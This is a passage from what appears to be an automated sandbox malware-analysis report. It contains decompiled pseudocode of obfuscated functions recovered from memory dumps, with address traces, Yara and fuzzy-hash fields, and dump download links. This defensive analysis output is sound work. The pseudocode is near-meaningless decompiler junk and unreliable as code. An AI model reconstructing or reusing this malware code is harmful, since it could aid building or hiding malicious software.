									asm("movsb");
									return _t42;
								}
							}
						}
					}
					L3:
					asm("adc [0x9c51b074], ecx");
					 *0xae61426 = _t54;
					asm("movsb");
					 *0xdd145d4 =  *0xdd145d4 - _t62;
					asm("adc esi, [0x8ff90139]");
					_t62 = _t62 + 2;
					 *0xb454e0e0 =  *0xb454e0e0 - _t53;
					asm("adc [0xa41e48bb], esi");
					_pop(_t54);
					 *0x493bdb32 =  *0x493bdb32 >> 0x39;
					L1();
					asm("ror dword [0xb221b2e8], 0xc5");
					_t37 = _t37 & 0x0000001c;
					asm("adc ebp, [0x7ac35861]");
					 *0xf7154f3b =  *0xf7154f3b - 0x90f9ad25;
					_t48 = _t48 + 1;
					 *0xa24e3c15 =  *0xa24e3c15 - _t53;
					 *0x3be3279f =  *0x3be3279f & _t44;
					asm("sbb [0x9042f2c2], ebx");
					L1:
					asm("ror dword [0x57b1f009], 0x69");
					_t79 = _t79 + 1;
					asm("rol dword [0x3935b90d], 0xf3");
				}
			}
















                                                                                                                                                    0x0041c201
                                                                                                                                                    0x0041c213
                                                                                                                                                    0x0041c216
                                                                                                                                                    0x0041c219
                                                                                                                                                    0x0041c21f
                                                                                                                                                    0x0041c232
                                                                                                                                                    0x0041c232
                                                                                                                                                    0x0041c238
                                                                                                                                                    0x0041c23a
                                                                                                                                                    0x0041c23b
                                                                                                                                                    0x0041c242
                                                                                                                                                    0x0041c24e
                                                                                                                                                    0x0041c254
                                                                                                                                                    0x0041c25e
                                                                                                                                                    0x0041c265
                                                                                                                                                    0x0041c26b
                                                                                                                                                    0x0041c275
                                                                                                                                                    0x0041c27b
                                                                                                                                                    0x0041c281
                                                                                                                                                    0x0041c287
                                                                                                                                                    0x0041c291
                                                                                                                                                    0x0041c297
                                                                                                                                                    0x0041c29d
                                                                                                                                                    0x0041c2a3
                                                                                                                                                    0x0041c2a9
                                                                                                                                                    0x0041c2ac
                                                                                                                                                    0x0041c2b2
                                                                                                                                                    0x0041c2bf
                                                                                                                                                    0x0041c2c5
                                                                                                                                                    0x0041c2cd
                                                                                                                                                    0x0041c2d3
                                                                                                                                                    0x0041c2d4
                                                                                                                                                    0x0041c2e2
                                                                                                                                                    0x0041c2e8
                                                                                                                                                    0x0041c2f0
                                                                                                                                                    0x0041c2f6
                                                                                                                                                    0x0041c2fb
                                                                                                                                                    0x0041c301
                                                                                                                                                    0x0041c307
                                                                                                                                                    0x0041c30d
                                                                                                                                                    0x0041c30e
                                                                                                                                                    0x0041c314
                                                                                                                                                    0x0041c31a
                                                                                                                                                    0x0041c320
                                                                                                                                                    0x0041c326
                                                                                                                                                    0x0041c327
                                                                                                                                                    0x0041c32e
                                                                                                                                                    0x0041c337
                                                                                                                                                    0x0041c338
                                                                                                                                                    0x0041c33b
                                                                                                                                                    0x0041c33c
                                                                                                                                                    0x0041c33f
                                                                                                                                                    0x0041c349
                                                                                                                                                    0x0041c350
                                                                                                                                                    0x0041c355
                                                                                                                                                    0x0041c369
                                                                                                                                                    0x0041c36f
                                                                                                                                                    0x0041c375
                                                                                                                                                    0x0041c376
                                                                                                                                                    0x0041c37c
                                                                                                                                                    0x0041c382
                                                                                                                                                    0x0041c383
                                                                                                                                                    0x0041c387
                                                                                                                                                    0x0041c388
                                                                                                                                                    0x0041c388
                                                                                                                                                    0x0041c369
                                                                                                                                                    0x0041c30e
                                                                                                                                                    0x0041c2bf
                                                                                                                                                    0x0041c29d
                                                                                                                                                    0x0041c281
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4bf
                                                                                                                                                    0x0041b4d8
                                                                                                                                                    0x0041b4d9
                                                                                                                                                    0x0041b4da
                                                                                                                                                    0x0041b4e2
                                                                                                                                                    0x0041b4e8
                                                                                                                                                    0x0041b4ee
                                                                                                                                                    0x0041b4f5
                                                                                                                                                    0x0041b4f6
                                                                                                                                                    0x0041b503
                                                                                                                                                    0x0041b509
                                                                                                                                                    0x0041b515
                                                                                                                                                    0x0041b517
                                                                                                                                                    0x0041b534
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b54a
                                                                                                                                                    0x0041b551
                                                                                                                                                    0x0041b557
                                                                                                                                                    0x0041b561
                                                                                                                                                    0x0041b57a
                                                                                                                                                    0x0041b57d
                                                                                                                                                    0x0041b583
                                                                                                                                                    0x0041b58a
                                                                                                                                                    0x0041b58f
                                                                                                                                                    0x0041b595
                                                                                                                                                    0x0041b5aa
                                                                                                                                                    0x0041b5b1
                                                                                                                                                    0x0041b5b8
                                                                                                                                                    0x0041b5c3
                                                                                                                                                    0x0041b5c9
                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5df
                                                                                                                                                    0x0041b5e6
                                                                                                                                                    0x0041b5ec
                                                                                                                                                    0x0041b5f2
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b666
                                                                                                                                                    0x0041b66c
                                                                                                                                                    0x0041b678
                                                                                                                                                    0x0041b67e
                                                                                                                                                    0x0041b68b
                                                                                                                                                    0x0041b694
                                                                                                                                                    0x0041b69e
                                                                                                                                                    0x0041b6a4
                                                                                                                                                    0x0041b6aa
                                                                                                                                                    0x0041b6ab
                                                                                                                                                    0x0041b6b7
                                                                                                                                                    0x0041b6bd
                                                                                                                                                    0x0041b6c9
                                                                                                                                                    0x0041b6cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b6d5
                                                                                                                                                    0x0041b6d5
                                                                                                                                                    0x0041b6e1
                                                                                                                                                    0x0041b6ee
                                                                                                                                                    0x0041b6f5
                                                                                                                                                    0x0041b6f6
                                                                                                                                                    0x0041b6fc
                                                                                                                                                    0x0041b703
                                                                                                                                                    0x0041b704
                                                                                                                                                    0x0041b70b
                                                                                                                                                    0x0041b711
                                                                                                                                                    0x0041b712
                                                                                                                                                    0x0041b718
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b71e
                                                                                                                                                    0x0041b71e
                                                                                                                                                    0x0041b730
                                                                                                                                                    0x0041b736
                                                                                                                                                    0x0041b73c
                                                                                                                                                    0x0041b74f
                                                                                                                                                    0x0041b750
                                                                                                                                                    0x0041b75b
                                                                                                                                                    0x0041b75b
                                                                                                                                                    0x0041b718
                                                                                                                                                    0x0041b6cf
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b5f8
                                                                                                                                                    0x0041b5f8
                                                                                                                                                    0x0041b5fe
                                                                                                                                                    0x0041b604
                                                                                                                                                    0x0041b605
                                                                                                                                                    0x0041b612
                                                                                                                                                    0x0041b618
                                                                                                                                                    0x0041b619
                                                                                                                                                    0x0041b61f
                                                                                                                                                    0x0041b625
                                                                                                                                                    0x0041b626
                                                                                                                                                    0x0041b62d
                                                                                                                                                    0x0041b632
                                                                                                                                                    0x0041b639
                                                                                                                                                    0x0041b63b
                                                                                                                                                    0x0041b641
                                                                                                                                                    0x0041b64d
                                                                                                                                                    0x0041b64e
                                                                                                                                                    0x0041b654
                                                                                                                                                    0x0041b65a
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4b6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 20f721d3c4202bc5deca7ade5d77faf9419f2aded296d3ec73a33e101a0c8007
                                                                                                                                                    • Instruction ID: 1cb0f217c05fe4c3282d479f9155223b4ec6f9c219b149af27e62c3a77850234
                                                                                                                                                    • Opcode Fuzzy Hash: 20f721d3c4202bc5deca7ade5d77faf9419f2aded296d3ec73a33e101a0c8007
                                                                                                                                                    • Instruction Fuzzy Hash: 25B19932918385CFE705DF78D88AB913FB5F786360B04425FD5A297292D3782166CF89
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C9D005, Relevance: .2, Instructions: 221COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d1c1a276240ea9e44afa40be6b87b6f20c8ea622e2bc16c6eb797021964f3c21
                                                                                                                                                    • Instruction ID: d13214c675eec15058a01099daf6e90ecdb5750d20146cd338cb48003fda2632
                                                                                                                                                    • Opcode Fuzzy Hash: d1c1a276240ea9e44afa40be6b87b6f20c8ea622e2bc16c6eb797021964f3c21
                                                                                                                                                    • Instruction Fuzzy Hash: 97911876414326CBCB248F06C4941B93BA2FF65751B25806EFD825F791D734CA92E7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D0F8EE, Relevance: .2, Instructions: 188COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 86caa5f8859e6a2620d37cfa22e356ad40c7430248bcb9941e4efb720772747f
                                                                                                                                                    • Instruction ID: d36d00c2027b4a1491291746305b62fd41598a179f72c274b76f296d7cc9d3a9
                                                                                                                                                    • Opcode Fuzzy Hash: 86caa5f8859e6a2620d37cfa22e356ad40c7430248bcb9941e4efb720772747f
                                                                                                                                                    • Instruction Fuzzy Hash: C4617171A002219FDB348F11C454BBBBBB5EF55714F6981A9E44D2BAD6C338A846CFB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00CBA37B, Relevance: .2, Instructions: 175COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dc44a0768bac2466c62c381d5460d46a698a40e92ce03869a98b0d3fc627d01a
                                                                                                                                                    • Instruction ID: e8da2c68f1bd2b1bccf586d8b55d39b948ef86ec79fb3c0501b3c365592f0723
                                                                                                                                                    • Opcode Fuzzy Hash: dc44a0768bac2466c62c381d5460d46a698a40e92ce03869a98b0d3fc627d01a
                                                                                                                                                    • Instruction Fuzzy Hash: 2F51D173E105259BE3408E5ACC00299B6A3EBC4314F2FC279DC689B385DAB9ED12C6C0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041C75F, Relevance: .2, Instructions: 172COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                    			E0041C75F(void* __eax, void* __ebx, signed char __ecx, signed int __edx, void* __esi) {
				signed int _t23;
				void* _t24;
				signed int _t25;
				signed int _t26;
				signed char _t29;
				signed char _t40;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t50;
				signed int _t53;
				signed int _t55;
				signed int _t56;

				_t40 = __edx;
				_t38 = __ecx;
				 *0xb4a0470c =  *0xb4a0470c ^ __edx;
				_t23 = (__eax - 0xcc32c1de |  *0x16efa8e0) +  *0xc2ccecc9;
				_pop(_t42);
				asm("rol dword [0x16d24939], 0x6f");
				asm("rcr byte [0x3ccdc486], 0xb1");
				asm("sbb ebx, [0x32c1ddbd]");
				_t50 = _t49 -  *0x93b70016;
				_t29 = __ebx - 1;
				if(_t29 < 0) {
					L1:
					 *0x939ff7b7 =  *0x939ff7b7 >> 0xc9;
					 *0x8f83e7b0 =  *0x8f83e7b0 & _t38;
				} else {
					__ebx = __ebx - 0xaf88ac70;
					_pop(__edi);
					__edx = __edx & 0x16d24939;
					asm("rol byte [0x54942410], 0xf5");
					__ebp = __ebp ^  *0xef45d88d;
					 *0x90e04c16 =  *0x90e04c16 ^ __ebx;
					if( *0x90e04c16 > 0) {
						goto L1;
					} else {
						__eax = __eax ^  *0x45d8a8c4;
						__esp = __esp | 0x9e3f16ef;
						 *0xf9e2bc0 =  *0xf9e2bc0 >> 0xd5;
						asm("sbb eax, 0x40ecb2a1");
						 *0x8f16ef88 =  *0x8f16ef88 >> 0x9f;
						 *0x826380d6 =  *0x826380d6 >> 0xf5;
						 *0xa8c4a800 =  *0xa8c4a800 >> 0x65;
						__edx = __edx ^  *0x2bbc121f;
						asm("sbb ecx, [0xb2a10f9e]");
						__esp = __esp ^ 0xef8840ec;
						__ebp = __ebp & 0x9fe24b16;
						 *0x49395fc2 = __ebp;
						__eax =  *0xdec32e33;
						__eax =  *0xdec32e33 |  *0xe0cc32c1;
						asm("rol byte [0x6216efa8], 0x15");
						 *0x9a8081e2 =  *0x9a8081e2 >> 0x28;
						 *0xd8a8c4a8 =  *0xd8a8c4a8 & __al;
						__ebp = __ebp + 1;
						if( *0xd6b616ef < __esi) {
							goto L1;
							do {
								do {
									do {
										do {
											do {
												do {
													goto L1;
												} while ( *0x8f83e7b0 == 0);
												_push( *0xdc624d74);
												_t29 = _t29 |  *0xc419e217;
												 *0x84e5c4bb =  *0x84e5c4bb << 0xf5;
											} while ( *0x84e5c4bb != 0);
											asm("adc eax, 0xdd634e75");
										} while (_t40 >=  *0xaeb00218);
										asm("sbb edx, [0xe77cd173]");
										asm("lodsb");
										 *0xef4544a1 =  *0xef4544a1 << 0x40;
										asm("sbb dl, 0x1c");
										asm("sbb ebx, 0x32c1ddbd");
										asm("ror dword [0xefa8e0cc], 0xb8");
										asm("ror byte [0xa8e0cc32], 0x76");
										asm("sbb ebx, 0xc6a616ef");
										_t50 = _t50 -  *0x2f9d1616 + 1;
										 *0xc1daa919 =  *0xc1daa919 << 0xd8;
										asm("sbb [0xa8e0cc32], ah");
										 *0xc83916ef =  *0xc83916ef << 0x75;
									} while ( *0xc83916ef != 0);
									asm("rcr dword [0x997775], 0x4c");
									asm("rcr byte [0xd8a8c4a8], 0x67");
									_push(0xc68ff209);
									 *0x3816efa8 =  *0x3816efa8 << 0x66;
									_t53 = _t50 + 0x00000001 &  *0x173a7bc8;
									_push(_t40);
									_t24 = _t23 + 1;
									_push(_t24);
									_t25 = _t24 -  *0xef45d88d;
									 *0x81d04116 =  *0x81d04116 >> 0xf9;
									_push(_t25);
									asm("ror byte [0x4052173a], 0x23");
									 *0x9cba1d16 =  *0x9cba1d16 ^ _t25;
									_t26 = _t25;
									_t38 = 0xb4;
									asm("scasb");
									_push(_t53);
									 *0x3d99a1e7 =  *0x3d99a1e7 >> 0x5d;
									_t50 = _t53 + 1;
									_t23 = _t26 ^  *0x8daddd0f ^  *0x32ee16ef;
									 *0xbe0b1c6d = 0xe0cc3283;
									 *0x32bfddbe = 0xcc32c1ef;
									_t42 = _t42 +  *0xefa8e0cc;
									asm("sbb [0x7093ff16], esp");
									 *0xc5f7c62b =  *0xc5f7c62b >> 0x41;
									asm("sbb [0xa8e0cc32], al");
									 *0x34f216ef =  *0x34f216ef << 0x34;
									asm("adc [0xd9b004fa], ebx");
									asm("sbb eax, 0xe0cc32b9");
									 *0x2116efa8 =  *0x2116efa8 >> 0x81;
									asm("adc ah, 0xb3");
									_t29 =  *0xbe0b1c6d + 0xc6 +  *0xd601ee67;
									asm("ror dword [0x49395fc0], 0x32");
									_t40 =  *0xa2f716d2;
									 *0xa2f716d2 =  *0x17ff2f8a;
								} while (_t29 <= 0);
								asm("adc esi, [0x395f828e]");
								_t40 = _t40 + 0xd2;
								_t56 = _t55 - 0xb36b616;
								 *0xaece9d8d =  *0xaece9d8d & _t56;
								 *0xa8e0cc32 =  *0xa8e0cc32 | _t23;
								_push( *0xe0cc32c1);
								asm("sbb ch, 0xa8");
								_t23 =  *0x395fc3cc;
								_t38 = 0xb2;
								asm("sbb [0x420816d2], cl");
								asm("sbb edi, [0xe0cc32ba]");
								asm("adc esp, [0x5fbed3f5]");
								 *0x16d24939 =  *0x16d24939 ^ _t23;
								 *0x71c621c =  *0x71c621c | 0x000000b4;
								asm("movsb");
								_t50 = _t50 - 0xf2ba16ef -  *0xcc32c1db;
								asm("rol byte [0xfe16efa8], 0x5c");
								_t29 = (0x00000032 -  *0xefa8e0cc |  *0x9e8e16ef) &  *0x9a7c73a2;
								_t55 = _t56 |  *0x9ba0f4be;
								 *0xa899d1b4 =  *0xa899d1b4 & _t40;
								_pop(_t45);
								_t42 = _t45 +  *0x16d24939;
							} while (_t42 != 0);
							 *0x2e33947a =  *0x2e33947a & _t55;
							return _t23;
						} else {
							__edi = __edi -  *0x52173a78;
							__eax = __eax + 1;
							_push(__eax);
							__eax = __eax &  *0xef45d88d;
							__al = __al | 0x00000016;
							return __eax;
						}
					}
				}
			}
















                                                                                                                                                    0x0041c75f
                                                                                                                                                    0x0041c75f
                                                                                                                                                    0x0041c76a
                                                                                                                                                    0x0041c770
                                                                                                                                                    0x0041c776
                                                                                                                                                    0x0041c777
                                                                                                                                                    0x0041c77e
                                                                                                                                                    0x0041c785
                                                                                                                                                    0x0041c791
                                                                                                                                                    0x0041c797
                                                                                                                                                    0x0041c798
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c503
                                                                                                                                                    0x0041c79e
                                                                                                                                                    0x0041c79e
                                                                                                                                                    0x0041c7a4
                                                                                                                                                    0x0041c7a5
                                                                                                                                                    0x0041c7ab
                                                                                                                                                    0x0041c7b8
                                                                                                                                                    0x0041c7be
                                                                                                                                                    0x0041c7c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c7ca
                                                                                                                                                    0x0041c7d0
                                                                                                                                                    0x0041c7d6
                                                                                                                                                    0x0041c7dc
                                                                                                                                                    0x0041c7e3
                                                                                                                                                    0x0041c7e8
                                                                                                                                                    0x0041c7ef
                                                                                                                                                    0x0041c7f6
                                                                                                                                                    0x0041c803
                                                                                                                                                    0x0041c809
                                                                                                                                                    0x0041c80f
                                                                                                                                                    0x0041c815
                                                                                                                                                    0x0041c821
                                                                                                                                                    0x0041c82d
                                                                                                                                                    0x0041c832
                                                                                                                                                    0x0041c838
                                                                                                                                                    0x0041c83f
                                                                                                                                                    0x0041c849
                                                                                                                                                    0x0041c84f
                                                                                                                                                    0x0041c856
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c50b
                                                                                                                                                    0x0041c511
                                                                                                                                                    0x0041c517
                                                                                                                                                    0x0041c517
                                                                                                                                                    0x0041c521
                                                                                                                                                    0x0041c526
                                                                                                                                                    0x0041c52e
                                                                                                                                                    0x0041c534
                                                                                                                                                    0x0041c535
                                                                                                                                                    0x0041c542
                                                                                                                                                    0x0041c545
                                                                                                                                                    0x0041c54b
                                                                                                                                                    0x0041c55e
                                                                                                                                                    0x0041c565
                                                                                                                                                    0x0041c56b
                                                                                                                                                    0x0041c56c
                                                                                                                                                    0x0041c573
                                                                                                                                                    0x0041c579
                                                                                                                                                    0x0041c579
                                                                                                                                                    0x0041c586
                                                                                                                                                    0x0041c58d
                                                                                                                                                    0x0041c59b
                                                                                                                                                    0x0041c5a6
                                                                                                                                                    0x0041c5ad
                                                                                                                                                    0x0041c5b3
                                                                                                                                                    0x0041c5b4
                                                                                                                                                    0x0041c5b5
                                                                                                                                                    0x0041c5b6
                                                                                                                                                    0x0041c5bc
                                                                                                                                                    0x0041c5c9
                                                                                                                                                    0x0041c5d6
                                                                                                                                                    0x0041c5e4
                                                                                                                                                    0x0041c5ea
                                                                                                                                                    0x0041c5eb
                                                                                                                                                    0x0041c5f9
                                                                                                                                                    0x0041c600
                                                                                                                                                    0x0041c601
                                                                                                                                                    0x0041c608
                                                                                                                                                    0x0041c609
                                                                                                                                                    0x0041c621
                                                                                                                                                    0x0041c638
                                                                                                                                                    0x0041c63e
                                                                                                                                                    0x0041c644
                                                                                                                                                    0x0041c64a
                                                                                                                                                    0x0041c651
                                                                                                                                                    0x0041c657
                                                                                                                                                    0x0041c65e
                                                                                                                                                    0x0041c664
                                                                                                                                                    0x0041c669
                                                                                                                                                    0x0041c673
                                                                                                                                                    0x0041c676
                                                                                                                                                    0x0041c67c
                                                                                                                                                    0x0041c683
                                                                                                                                                    0x0041c683
                                                                                                                                                    0x0041c683
                                                                                                                                                    0x0041c694
                                                                                                                                                    0x0041c69b
                                                                                                                                                    0x0041c69e
                                                                                                                                                    0x0041c6b8
                                                                                                                                                    0x0041c6be
                                                                                                                                                    0x0041c6d0
                                                                                                                                                    0x0041c6d6
                                                                                                                                                    0x0041c6e5
                                                                                                                                                    0x0041c6ea
                                                                                                                                                    0x0041c6eb
                                                                                                                                                    0x0041c6f7
                                                                                                                                                    0x0041c709
                                                                                                                                                    0x0041c70f
                                                                                                                                                    0x0041c715
                                                                                                                                                    0x0041c71b
                                                                                                                                                    0x0041c71c
                                                                                                                                                    0x0041c725
                                                                                                                                                    0x0041c72c
                                                                                                                                                    0x0041c73e
                                                                                                                                                    0x0041c744
                                                                                                                                                    0x0041c74a
                                                                                                                                                    0x0041c74b
                                                                                                                                                    0x0041c74b
                                                                                                                                                    0x0041c757
                                                                                                                                                    0x0041c75d
                                                                                                                                                    0x0041c85c
                                                                                                                                                    0x0041c85c
                                                                                                                                                    0x0041c862
                                                                                                                                                    0x0041c863
                                                                                                                                                    0x0041c864
                                                                                                                                                    0x0041c86a
                                                                                                                                                    0x0041c86c
                                                                                                                                                    0x0041c86c
                                                                                                                                                    0x0041c856
                                                                                                                                                    0x0041c7c4

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9d058cfe2ba990bdce56f593fc40fe7effac11541c9a759078d0619f1f834f9e
                                                                                                                                                    • Instruction ID: 7783f60e8238d84215050eb48eaa1547aa99ec152cff665a18317cee5e717f8c
                                                                                                                                                    • Opcode Fuzzy Hash: 9d058cfe2ba990bdce56f593fc40fe7effac11541c9a759078d0619f1f834f9e
                                                                                                                                                    • Instruction Fuzzy Hash: DE81013284D3C5DFE711EF78D8DA6823FB1E75A320B08478AC8A15B1D2C37421AACB45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00CA5485, Relevance: .2, Instructions: 172COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 78c0f2ba0aaa544609cedf9d6384968bb60cc7abe00bee97c9f00710e08dd557
                                                                                                                                                    • Instruction ID: 642926e07c3ab215edeff5e85cda04715f4f30a7a4a5c207bc21585634528594
                                                                                                                                                    • Opcode Fuzzy Hash: 78c0f2ba0aaa544609cedf9d6384968bb60cc7abe00bee97c9f00710e08dd557
                                                                                                                                                    • Instruction Fuzzy Hash: 7C51FC7AF50A628BC718CF1ECC84128BBE2FB8A31571E8166DB59D7391C6708D42D7E4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402D90, Relevance: .2, Instructions: 165COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
